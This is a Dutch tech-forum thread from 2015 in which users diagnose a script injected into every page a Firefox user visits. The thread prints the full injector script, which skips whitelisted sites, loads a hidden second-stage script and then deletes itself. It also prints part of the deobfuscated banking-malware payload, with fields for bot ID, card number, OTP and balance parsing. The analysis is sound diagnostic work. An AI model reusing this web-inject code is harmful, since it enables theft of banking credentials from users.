Toon posts:

[Firefox] vaag stukje in de broncode

Pagina: 1
Acties:

Onderwerpen

Malware

vrijdag 31 juli 2015 14:01

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Hallo,
Was bezig met html en keek in de broncode en zag een vaag stukje code, dit komt op alle sites terug (ook op tweakers) Heb extensies al uitgezet, maar blijf het houden.
Al google gedaan om stukken van de code maar geen resultaten. In internet explorer zie ik dat stuk code niet en als startpagina krijg ik de code ook niet.
code:
1

<script id='inj_add_cc' name='inj_add_cc' type='text/javascript'>(function(){navigator.bot_id_cc='BOT_ID';var s_u=['ya.ru','rambler.ru','mail','bank','yahoo','live.com','aol.com','google','bing','pekao','pkobp'],i,tmp;for (i=0; i<s_u.length; i++){tmp=new RegExp(s_u[i]);if (tmp.test(document.location.href)) {destroy();delete navigator.bot_id_cc;return true;}}document.write('<scr'+'ipt id="inj_inj_cc" name="inj_inj_cc" type="text/javascript" src="https://'+document.location.host+'/support/googleanaliticsmboxface.cgi/______ooo0__00ooooOOOo0000___/content/cc/__n.js?r='+Number(new Date())+'"></scr'+'ipt>'); function destroy (){try{document.scripts.inj_add_cc.parentNode.removeChild(document.scripts.inj_add_cc)}catch(err) {var a=document.getElementById('inj_add_cc');a.parentNode.removeChild(a)}}}())</script>

Afbeeldingslocatie: http://i.imgur.com/fHykuN8.png

Iemand hier meer last van idee waar dit vanaf komt?

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

vrijdag 31 juli 2015 14:07

Acties:
  • 0 Henk 'm!
  • 3raser
  • Registratie: Mei 2008
  • Laatst online: 12-09 08:32

3raser

⚜️ Premium member

Ziet eruit als malware. Ik zou je pc maar eens scannen met MalwareBytes of een soortgelijk programma.

vrijdag 31 juli 2015 14:19

Acties:
  • 0 Henk 'm!
  • Juup
  • Registratie: Februari 2000
  • Niet online

Juup

De betreffende code iets mooier:
JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

(function() {
    navigator.bot_id_cc = 'BOT_ID';
    var s_u = ['ya.ru', 'rambler.ru', 'mail', 'bank', 'yahoo', 'live.com', 'aol.com', 'google', 'bing', 'pekao', 'pkobp'],
        i, tmp;
    for (i = 0; i < s_u.length; i++) {
        tmp = new RegExp(s_u[i]);
        if (tmp.test(document.location.href)) {
            destroy();
            delete navigator.bot_id_cc;
            return true;
        }
    }
    document.write('<scr' + 'ipt id="inj_inj_cc" name="inj_inj_cc" type="text/javascript" src="https://' + document.location.host + '/support/googleanaliticsmboxface.cgi/______ooo0__00ooooOOOo0000___/content/cc/__n.js?r=' + Number(new Date()) + '"></scr' + 'ipt>');

    function destroy() {
        try {
            document.scripts.inj_add_cc.parentNode.removeChild(document.scripts.inj_add_cc)
        } catch (err) {
            var a = document.getElementById('inj_add_cc');
            a.parentNode.removeChild(a)
        }
    }
}())

vreemd dat hij een script probeert te injecteren op document.location.host.

Een wappie is iemand die gevallen is voor de (jarenlange) Russische desinformatiecampagnes.
Wantrouwen en confirmation bias doen de rest.

vrijdag 31 juli 2015 14:22

Acties:
  • 0 Henk 'm!
  • Jumpman
  • Registratie: Januari 2002
  • Laatst online: 08:35

Jumpman

Ik ben erg benieuwd wat een Malware scan oplevert.

Nintendo Network ID: Oo_Morris_oO | PSN: Oo_Morris_oO.

vrijdag 31 juli 2015 14:26

Acties:
  • 0 Henk 'm!
  • Naj_Geetsrev
  • Registratie: Oktober 2002
  • Laatst online: 21-07 13:18

Naj_Geetsrev

En als ik op googleanaliticsmboxface zoek is het enige resultaat deze pagina.

Gezien de benaming (inj_cc, mbox, etc.) en de websites boven in de code wordt deze code gebruikt om personen toe te voegen in het cc veld. Waarschijnlijk om zichzelf te verspreiden of misschien om een spammailing vanuit je email uit te voeren. Zeer waarschijnlijk super nieuwe malware.

vrijdag 31 juli 2015 15:25

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Scan gedaan, echter niets gevonden van firefox.
Afbeeldingslocatie: http://i.imgur.com/NraqsDl.png
Super nieuwe malware kan, alleen vraag ik mij dan toch wat dingen af
- Waarom Firefox en niet Internet Explorer? Zowel IE als FF heeft het.
- Zoals in code te zien is localhost wat heeft dat voor nut...
- Belangrijkste van alles hoe ben ik geïnfecteerd?
Los van hoe en waarom. Dit zal ook wel is oorzaak kunnen zijn waarom firefox regelmatig sinds kort crashed.
Afbeeldingslocatie: http://i.imgur.com/MPhuDwA.png

[ Voor 72% gewijzigd door RobbyTown op 31-07-2015 15:38 ]

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

vrijdag 31 juli 2015 15:41

Acties:
  • 0 Henk 'm!
  • 3raser
  • Registratie: Mei 2008
  • Laatst online: 12-09 08:32

3raser

⚜️ Premium member

Het is gegarandeerd een virus/malware.
Javascript code wat het woord "script" opbreekt in "scr" en "ipt" probeert sowieso iets te verbergen. En aangezien je dit bij iedere website hebt moet het wel aan je eigen pc liggen.

vrijdag 31 juli 2015 15:49

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Scanners liggen achter, Sophos, Malwarebytes en Adware cleaner vinden niets :/

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

vrijdag 31 juli 2015 15:53

Acties:
  • 0 Henk 'm!
  • Juup
  • Registratie: Februari 2000
  • Niet online

Juup

Kun je ook de sourcecode van het (2e) script dat geinclude wordt posten?

[ Voor 3% gewijzigd door Juup op 31-07-2015 15:53 ]

Een wappie is iemand die gevallen is voor de (jarenlange) Russische desinformatiecampagnes.
Wantrouwen en confirmation bias doen de rest.

vrijdag 31 juli 2015 15:53

Acties:
  • 0 Henk 'm!
  • Thralas
  • Registratie: December 2002
  • Laatst online: 10:21

Thralas

Als firefox zo vaak crashed zou ik eens nagaan welke DLLs er allemaal ingeladen worden. Process Explorer helpt je daar vast bij.

En als je 'm toch open hebt, screenshotje van alle processen?

Verder:
- Geen proxies/plugins in FF/IE?
- Gebeurt het ook op HTTPS-pages?

[ Voor 36% gewijzigd door Thralas op 31-07-2015 15:57 ]

vrijdag 31 juli 2015 16:13

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Juup schreef op vrijdag 31 juli 2015 @ 15:53:
Kun je ook de sourcecode van het (2e) script dat geinclude wordt posten?
2de script? Mijn Javascript kennis is niet al te geweldig. Neem aan script met googleanaliticsmboxface?
https://localhost//support/googleanaliticsmboxface.cgi/______ooo0__00ooooOOOo0000___/content/cc/__n.js?r= lukt in elk geval niet...
Thralas schreef op vrijdag 31 juli 2015 @ 15:53:
Als firefox zo vaak crashed zou ik eens nagaan welke DLLs er allemaal ingeladen worden. Process Explorer helpt je daar vast bij.
En als je 'm toch open hebt, screenshotje van alle processen?
Verder:
- Geen proxies/plugins in FF/IE?
- Gebeurt het ook op HTTPS-pages?
Past niet op 1 lijst daarom 2 screenshots
http://i.imgur.com/gFY6Uk1.png
http://i.imgur.com/sfZikNw.png
Firefox DLL
http://i.imgur.com/aMF9FAv.png
http://i.imgur.com/3oTbuAu.png
http://i.imgur.com/Sl8367S.png
IE is plugin vrij die gebruik ik zelden.
HTTP of HTTPS ik merk geen verschil. Firefox crasht random

Dat word denk ik formatteren en upgrade naar 10 :)

[ Voor 49% gewijzigd door RobbyTown op 31-07-2015 16:47 ]

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

vrijdag 31 juli 2015 16:17

Acties:
  • 0 Henk 'm!
  • emnich
  • Registratie: November 2012
  • Niet online

emnich

kom je hier vaker?

Hij gebruikt geen localhost maar document.location.host. Dus gewoon de host van de pagina waar je op zit.

Dit kan dus alleen werken als óók de website gehackt is.

vrijdag 31 juli 2015 16:45

Acties:
  • 0 Henk 'm!
  • Thralas
  • Registratie: December 2002
  • Laatst online: 10:21

Thralas

emnich schreef op vrijdag 31 juli 2015 @ 16:17:
Dit kan dus alleen werken als óók de website gehackt is.
Of je browser ;)

vrijdag 31 juli 2015 16:56

Acties:
  • 0 Henk 'm!
  • Petervanakelyen
  • Registratie: December 2006
  • Laatst online: 30-04 12:52

Petervanakelyen

Op basis van de code weten we dat:

• Het hoogstwaarschijnlijk van russisch/poolse oorsprong is (*.ru domeinen, pekao = Poolse bank)
• Bepaalde domeinen/keywords zijn gewhitelist (live.com, google, bing,...)
• Op niet-whitelisted domeinen een tweede (nog onbekend) stukje javascript wordt geïnjecteerd in de pagina via een url die enkel kan geresolved worden bij een gehackte website of browser (thx Thralas).

(2) verklaart waarom je het script wel kan zien op Tweakers.net maar niet op je startpagina (tenminste, als je Google of Bing als startpagina gebruikt). Rest ons enkel nog de vraag hoe/waar wordt geïnjecteerd.

Mijn eerste gok is dat je verkeer momenteel wordt geproxied, het zou interessant zijn om eens met Wireshark te kijken hoe een HTTP-request naar een eenvoudige website eruitziet.

Somewhere in Texas there's a village missing its idiot.

vrijdag 31 juli 2015 17:01

Acties:
  • 0 Henk 'm!
  • Juup
  • Registratie: Februari 2000
  • Niet online

Juup

RobbyTown schreef op vrijdag 31 juli 2015 @ 16:13:
2de script? Mijn Javascript kennis is niet al te geweldig. Neem aan script met googleanaliticsmboxface?
https://localhost//support/googleanaliticsmboxface.cgi/______ooo0__00ooooOOOo0000___/content/cc/__n.js?r= lukt in elk geval niet...
Nee je moet niet op localhost zijn maar op het domein van de betreffende pagina/site.
Je wilt de inhoud van #inj_inj_cc weten.
Bv door hem in Firebug te inspecten

Een wappie is iemand die gevallen is voor de (jarenlange) Russische desinformatiecampagnes.
Wantrouwen en confirmation bias doen de rest.

vrijdag 31 juli 2015 17:06

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Juup schreef op vrijdag 31 juli 2015 @ 17:01:
[...]
Nee je moet niet op localhost zijn maar op het domein van de betreffende pagina/site.
Je wilt de inhoud van #inj_inj_cc weten.
Bv door hem in Firebug te inspecten
Gelukt: http://pastebin.com/JE33Dufe

Tweakers is mijn startpagina ga ik een pagina verder of klik het logo aan dan zie ik de code pas.

[ Voor 13% gewijzigd door RobbyTown op 31-07-2015 22:13 ]

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

vrijdag 31 juli 2015 17:08

Acties:
  • 0 Henk 'm!
  • Petervanakelyen
  • Registratie: December 2006
  • Laatst online: 30-04 12:52

Petervanakelyen

Nou, iemand die zich geroepen voelt dat te deobfuscaten? :+

Somewhere in Texas there's a village missing its idiot.

vrijdag 31 juli 2015 17:10

Acties:
  • 0 Henk 'm!
  • NeFoRcE
  • Registratie: Mei 2004
  • Laatst online: 18:56

NeFoRcE

Hallo? Bent u daar?

Ik zie het al, puntkomma vergeten @ regel 8423, karakter 234 :D

Professioneel Heftruck Syndroom

vrijdag 31 juli 2015 17:11

Acties:
  • 0 Henk 'm!
  • emnich
  • Registratie: November 2012
  • Niet online

emnich

kom je hier vaker?

Waar stond dat script nu?

vrijdag 31 juli 2015 17:17

Acties:
  • 0 Henk 'm!
  • Thralas
  • Registratie: December 2002
  • Laatst online: 10:21

Thralas

Als ik een klein beetje met m'n ogen knijp zie ik een hoop strings die wat van doen lijken te hebben met banking (ctrl+f balance).

En niets in de process/DLL list dat overduidelijk de boosdoener is (for what that's worth, nogal veel entries).

Misschien toch wijs om ook eens met GMER te kijken? Als ik aan bankingmalware denk, denk ik aan rootkits. En dan zie je sowieso niets in je process/DLL list, als het een beetje goed werkt.

vrijdag 31 juli 2015 17:23

Acties:
  • 0 Henk 'm!
  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

JavaScript:
1

var s_u = ['ya.ru', 'rambler.ru', 'mail', 'bank', 'yahoo', 'live.com', 'aol.com', 'google', 'bing', 'pekao', 'pkobp'],
Zover mijn kennis gaat, is dit een array en daarin zitten zo te zien sites. Wellicht kun je aan de hand van de onbekende en de Russische sites meer vinden?

vrijdag 31 juli 2015 17:29

Acties:
  • 0 Henk 'm!
  • Petervanakelyen
  • Registratie: December 2006
  • Laatst online: 30-04 12:52

Petervanakelyen

Nee, dat is de whitelist (dus een lijst van sites waar de malware niet wordt geladen). Ya.ru is van Yandex, één van de populairste zoekmachines in rusland, net zoals Rambler

Somewhere in Texas there's a village missing its idiot.

vrijdag 31 juli 2015 21:45

Acties:
  • 0 Henk 'm!
  • Rupie
  • Registratie: Augustus 2006
  • Laatst online: 08-09 15:19

Rupie

Dit lijkt mij meer iets voor BV dus ik verplaats je topic die kant op.

Desktop | Server | Laptop

zaterdag 1 augustus 2015 02:09

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Rupie schreef op vrijdag 31 juli 2015 @ 21:45:
Dit lijkt mij meer iets voor BV dus ik verplaats je topic die kant op.
Inmiddels wel ja |:( 8)7

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

zaterdag 1 augustus 2015 02:35

Acties:
  • 0 Henk 'm!

Verwijderd

Petervanakelyen schreef op vrijdag 31 juli 2015 @ 17:29:
Nee, dat is de whitelist (dus een lijst van sites waar de malware niet wordt geladen). Ya.ru is van Yandex, één van de populairste zoekmachines in rusland, net zoals Rambler
Ik vraag me dan af waarom de code daar niet geladen wordt. Bang voor detectie?

zaterdag 1 augustus 2015 03:32

Acties:
  • 0 Henk 'm!
  • johnkeates
  • Registratie: Februari 2008
  • Laatst online: 04-07 16:30

johnkeates

Kijk even wat netstat weergeeft. Kijk ook even welke processen en services draaien. Kijk ook naar je proxy instellingen.

zaterdag 1 augustus 2015 03:49

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Netstat gedaan. Krijg me toch een zooi aan verbindingen.
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126

C:\Users\rme>netstat
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    127.0.0.1:5354         NB-RME:49157           ESTABLISHED
  TCP    127.0.0.1:5354         NB-RME:49158           ESTABLISHED
  TCP    127.0.0.1:19872        NB-RME:62831           ESTABLISHED
  TCP    127.0.0.1:49157        NB-RME:5354            ESTABLISHED
  TCP    127.0.0.1:49158        NB-RME:5354            ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:62747           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:62828           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63401           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63404           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63409           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63410           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63412           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63414           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63421           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63423           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63425           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63426           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63429           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63431           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63433           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63436           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63437           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63439           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63441           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63443           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63445           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63450           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63453           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63457           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63461           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63464           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63466           ESTABLISHED
  TCP    127.0.0.1:49160        NB-RME:63469           TIME_WAIT
  TCP    127.0.0.1:49160        NB-RME:63472           TIME_WAIT
  TCP    127.0.0.1:62747        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:62782        NB-RME:62783           ESTABLISHED
  TCP    127.0.0.1:62783        NB-RME:62782           ESTABLISHED
  TCP    127.0.0.1:62784        NB-RME:62785           ESTABLISHED
  TCP    127.0.0.1:62785        NB-RME:62784           ESTABLISHED
  TCP    127.0.0.1:62802        NB-RME:62803           ESTABLISHED
  TCP    127.0.0.1:62803        NB-RME:62802           ESTABLISHED
  TCP    127.0.0.1:62804        NB-RME:62805           ESTABLISHED
  TCP    127.0.0.1:62805        NB-RME:62804           ESTABLISHED
  TCP    127.0.0.1:62806        NB-RME:62807           ESTABLISHED
  TCP    127.0.0.1:62807        NB-RME:62806           ESTABLISHED
  TCP    127.0.0.1:62809        NB-RME:62810           ESTABLISHED
  TCP    127.0.0.1:62810        NB-RME:62809           ESTABLISHED
  TCP    127.0.0.1:62811        NB-RME:62812           ESTABLISHED
  TCP    127.0.0.1:62812        NB-RME:62811           ESTABLISHED
  TCP    127.0.0.1:62828        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:62831        NB-RME:19872           ESTABLISHED
  TCP    127.0.0.1:62868        NB-RME:62869           ESTABLISHED
  TCP    127.0.0.1:62869        NB-RME:62868           ESTABLISHED
  TCP    127.0.0.1:63371        NB-RME:63372           ESTABLISHED
  TCP    127.0.0.1:63372        NB-RME:63371           ESTABLISHED
  TCP    127.0.0.1:63375        NB-RME:63376           ESTABLISHED
  TCP    127.0.0.1:63376        NB-RME:63375           ESTABLISHED
  TCP    127.0.0.1:63380        NB-RME:63381           ESTABLISHED
  TCP    127.0.0.1:63381        NB-RME:63380           ESTABLISHED
  TCP    127.0.0.1:63395        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63396        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63399        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63401        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63404        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63407        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63409        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63410        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63412        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63414        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63417        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63418        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63421        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63423        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63425        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63426        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63429        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63431        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63433        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63436        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63437        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63439        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63441        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63443        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63445        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63450        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63452        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63453        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63456        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63457        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63459        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63461        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63464        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63466        NB-RME:49160           ESTABLISHED
  TCP    127.0.0.1:63468        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63476        NB-RME:49160           TIME_WAIT
  TCP    127.0.0.1:63478        NB-RME:49160           TIME_WAIT
  TCP    192.168.111.51:2869    mdb1:41958             TIME_WAIT
  TCP    192.168.111.51:2869    mdb1:41960             TIME_WAIT
  TCP    192.168.111.51:2869    mdb1:41961             TIME_WAIT
  TCP    192.168.111.51:8194    NB-RME:63378           ESTABLISHED
  TCP    192.168.111.51:62683   185.31.18.193:http     ESTABLISHED
  TCP    192.168.111.51:62736   msnbot-191-232-139-61:https  ESTABLISH
  TCP    192.168.111.51:62748   do-11:https            ESTABLISHED
  TCP    192.168.111.51:62788   client:https           CLOSE_WAIT
  TCP    192.168.111.51:62829   ec2-52-25-238-173:https  ESTABLISHED
  TCP    192.168.111.51:62838   server-54-230-14-140:https  CLOSE_WAIT
  TCP    192.168.111.51:62839   server-54-230-14-140:https  CLOSE_WAIT
  TCP    192.168.111.51:62843   server-54-230-14-140:https  CLOSE_WAIT
  TCP    192.168.111.51:62844   d:https                CLOSE_WAIT
  TCP    192.168.111.51:62871   ash-ra1-2a:https       ESTABLISHED
  TCP    192.168.111.51:63159   ea-in-f102:http        TIME_WAIT
  TCP    192.168.111.51:63321   msnbot-191-232-139-58:https  ESTABLISH
  TCP    192.168.111.51:63373   172.16.0.11:8192       SYN_SENT
  TCP    192.168.111.51:63378   NB-RME:8194            ESTABLISHED
  TCP    192.168.111.51:63389   191.232.139.253:https  TIME_WAIT
  TCP    192.168.111.51:63390   a92-122-226-136:http   ESTABLISHED
  TCP    192.168.111.51:63393   ea-in-f113:http        TIME_WAIT
  TCP    192.168.111.51:63394   ec2-54-74-247-20:http  ESTABLISHED
  TCP    192.168.111.51:63397   23.235.43.65:http      TIME_WAIT
  TCP    192.168.111.51:63398   23.235.43.65:http      TIME_WAIT
  TCP    192.168.111.51:63400   23.235.43.65:http      TIME_WAIT
  TCP    192.168.111.51:63402   190.93.246.15:http     ESTABLISHED
  TCP    192.168.111.51:63405   wn-in-f147:https       ESTABLISHED


GMER gedraaid die ziet niets vreemds.

Het surfen word nu wel enorm traag. Tweakers is nu niet voorruit te branden, op mijn tel wel.

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

zaterdag 1 augustus 2015 04:03

Acties:
  • 0 Henk 'm!
  • johnkeates
  • Registratie: Februari 2008
  • Laatst online: 04-07 16:30

johnkeates

Wie of wat zijn:

192.168.111.51
NB-RME
mdb1
d
do-11
client

Klinken een beetje naar interne hostnames? Ik denk dat je computer op het moment actief misbruikt wordt. Misschien ben je beter af hem even uit te zetten, op een andere computer een Linux Live USB stick te maken, daar mee op te starten op je computer en dan je bestanden veiligstellen. Daarna een complete wipe en reinstall en je bent er van af.

Het zou trouwens ook interessant zijn om te kijken wat er verder nog gehijacked is, je zou AdwCleaner en JRT kunnen draaien, en misschien combofix. Niet om dat je daar zozeer je systeem weer gegarandeerd schoon mee maakt, maar om dat je kan zien waar je injectie en hijacking ongeveer plaats vindt.

[ Voor 26% gewijzigd door johnkeates op 01-08-2015 04:09 ]

zaterdag 1 augustus 2015 09:20

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
johnkeates schreef op zaterdag 01 augustus 2015 @ 04:03:
Wie of wat zijn:

192.168.111.51
NB-RME
mdb1
d
do-11
client

Klinken een beetje naar interne hostnames? Ik denk dat je computer op het moment actief misbruikt wordt. Misschien ben je beter af hem even uit te zetten, op een andere computer een Linux Live USB stick te maken, daar mee op te starten op je computer en dan je bestanden veiligstellen. Daarna een complete wipe en reinstall en je bent er van af.

Het zou trouwens ook interessant zijn om te kijken wat er verder nog gehijacked is, je zou AdwCleaner en JRT kunnen draaien, en misschien combofix. Niet om dat je daar zozeer je systeem weer gegarandeerd schoon mee maakt, maar om dat je kan zien waar je injectie en hijacking ongeveer plaats vindt.
192.168.111.51 = ip van de machine
NB-RME = hostname machine
de rest geen idee

AdwCleaner en JRT al gedraaid zien niets. Ook sophos, malwarebytes geen alarm belletje.

Bestanden apart zetten is niet nodig die staan op een 2de schijf (heb een sdd (OS) en msata (opslag/local vm's) aanboord)

wipe tool is nog steeds killdisk de goede of is er wat beters op de markt tegenwoordig?

[ Voor 9% gewijzigd door RobbyTown op 01-08-2015 09:27 ]

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

zaterdag 1 augustus 2015 09:45

Acties:
  • 0 Henk 'm!
  • sh4d0wman
  • Registratie: April 2002
  • Laatst online: 17:36

sh4d0wman

Attack | Exploit | Pwn

Kijk eens met Crowdinspect of je iets bijzonders kunt vinden. Ben wel benieuwd wat je hebt opgelopen :-)

This signature has been taken down by the Dutch police in the course of an international lawenforcement operation.

zaterdag 1 augustus 2015 10:53

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
sh4d0wman schreef op zaterdag 01 augustus 2015 @ 09:45:
Kijk eens met Crowdinspect of je iets bijzonders kunt vinden. Ben wel benieuwd wat je hebt opgelopen :-)
https://www.dropbox.com/s...08-01%2010.23.58.jpg?dl=0

Ip komt uit israel. Bij dropbox had ik ook een flinke lijst staan als rood aangemerkt. Snel dropbox gesloten.

Zonder internet dropbox aan, bij andere mensen ook dropbox rood? Zo ja dan weet ik dan het dat foute indicatie heeft. Dank Struikrover
https://www.dropbox.com/s...08-01%2010.57.23.jpg?dl=0

Btw handige tool, thanks kon deze nog niet.

[ Voor 23% gewijzigd door RobbyTown op 01-08-2015 15:34 ]

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

zaterdag 1 augustus 2015 11:10

Acties:
  • 0 Henk 'm!
  • Petervanakelyen
  • Registratie: December 2006
  • Laatst online: 30-04 12:52

Petervanakelyen

RobbyTown schreef op zaterdag 01 augustus 2015 @ 03:49:
GMER gedraaid die ziet niets vreemds.

Het surfen word nu wel enorm traag. Tweakers is nu niet voorruit te branden, op mijn tel wel.
Heb je nu al je proxy instellingen nagekeken? Dat lijkt mij nog steeds het meest voor de hand liggend.

Somewhere in Texas there's a village missing its idiot.

zaterdag 1 augustus 2015 11:30

Acties:
  • 0 Henk 'm!
  • Struikrover
  • Registratie: Juni 2005
  • Laatst online: 13:09

Struikrover

Zie voor Dropbox ook dit:
https://www.dropboxforum....-crowdinspect-application

Lijkt erop dat dit gewoon een false-positive is. Bij mij geeft ie ook uitroeptekens weer.

zaterdag 1 augustus 2015 12:06

Acties:
  • 0 Henk 'm!
  • Juup
  • Registratie: Februari 2000
  • Niet online

Juup

Als je de evil js code een beetje uit elkaar trekt krijg je dit soort meuk:
JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189

        var g4 = {
                        gateURL: '',
                        adminka_path: '',
                        bank_id: 0,
                        bot_id: navigator[(t4 + I7f + V4 + x + U + i6f + G)],
                        account_id: 0,
                        get_current_status___id: "",
                        no_answer_from_server___id: "",
                        wait_otp_from_holder___id: "",
                        show_dont_work_screen___id: "",
                        transfer_info: new Array(),
                        all_transfers_info: new Array(),
                        focus_amount_interval: '',
                        delay_ms: (A6 + Z2x),
                        control_amount_step: 0,
                        login_form_submitted: false,
                        work_on_account_runned: false,
                        detect_part_page_unloading_runned: false,
                        debug_transh: {},
                        wait_intervals: [],
                        main_page_replaced: false,
                        assets_page_replaced: false,
                        az_status: "",
                        card_number: '',
...
                        sendGateRequest: function(z, i, F) {
...
                        },
                        validate_phone_number: function(z) {
                                if (/359899999999/g [(r + O + D1)](z)) return false;
                                if (!/^\+?359\d{9}$/ [(r + O + B + r)](z)) return false;
                                return true;
                        },
                        parse_balances: function() {
                                var s4 = 'egu',
                                        F1 = 'tamosHi',
                                        T4 = 'meri',
                                        y1 = 'ane',
                                        j4 = 'Pl',
                                        r1 = 'ee',
                                        J4 = 'mpl',
                                        G1 = 'par',
                                        e1 = "_log",
                                        S1 = "plac",
                                        t1 = 'ume',
                                        d6 = "dre",
                                        N6 = 'ito',
                                        W1 = 'rs',
                                        B3 = "sage",
                                        x3 = "tex",
                                        t6 = "rim",
                                        B8 = 'tml',
